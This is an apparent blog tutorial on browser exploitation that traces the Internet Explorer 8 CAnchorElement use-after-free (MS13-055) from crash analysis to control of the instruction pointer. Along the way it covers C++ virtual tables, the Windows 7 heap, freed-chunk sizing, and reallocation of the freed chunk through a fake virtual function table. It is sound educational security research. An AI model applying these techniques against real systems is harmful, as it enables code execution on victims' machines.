Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

#

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx       ; The function is called

